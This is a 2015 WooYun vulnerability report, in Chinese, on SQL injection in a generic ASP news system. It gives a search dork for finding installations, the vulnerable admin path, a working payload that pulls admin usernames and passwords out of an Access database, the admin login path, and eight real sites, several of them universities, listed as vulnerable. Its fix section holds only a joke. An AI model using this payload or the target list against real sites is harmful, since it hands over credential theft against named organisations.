当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089707

漏洞标题:某通用型系统SQL注射

相关厂商:讯时系统

漏洞作者: 小骇

提交时间:2015-01-05 16:24

修复时间:2015-04-05 16:26

公开时间:2015-04-05 16:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某通用型系统SQL注射

详细说明:

某通用型系统SQL注射。

关键字:inurl:news_more.asp?lm2=


QQ图片20150102134337.jpg


注射地址:/admin/admin_news_pl_view.asp?action=save&id=1
注射代码:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
就可注入出用户密码。
案例:
http://www.zskaiyin.cn//admin/admin_news_pl_view.asp?action=save&id=1
http://zjw.hkuspace.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2
http://zsjy.hezeu.edu.cn/admin/admin_news_pl_view.asp?action=save&id=2
http://www.swupl.edu.cn/yjsjy//admin/admin_news_pl_view.asp?action=save&id=1
http://www.zyepb.cn/news34//admin/admin_news_pl_view.asp?action=save&id=6
http://tyb.usts.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2
http://www.qecc.cn//admin/admin_news_pl_view.asp?action=save&id=1
http://www.xhtu.com.cn/jwc//admin/admin_news_pl_view.asp?action=save&id=2

漏洞证明:

后台地址:/login.asp
证明如下:
http://www.zskaiyin.cn//admin/admin_news_pl_view.asp?action=save&id=1 为例。

QQ图片20150102134522.jpg

QQ图片20150102134540.jpg

QQ图片20150102134647.jpg

QQ图片20150102134705.jpg


还有其他网站均可注入数据:
http://zjw.hkuspace.edu.cn/news//admin/admin_news_pl_view.asp?action=save&id=2

QQ图片20150102134735.jpg


http://zsjy.hezeu.edu.cn/admin/admin_news_pl_view.asp?action=save&id=2

QQ图片20150102134758.jpg


http://www.swupl.edu.cn/yjsjy//admin/admin_news_pl_view.asp?action=save&id=1

QQ图片20150102134824.jpg


修复方案:

我要压岁钱,有木有?

版权声明:转载请注明来源 小骇@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝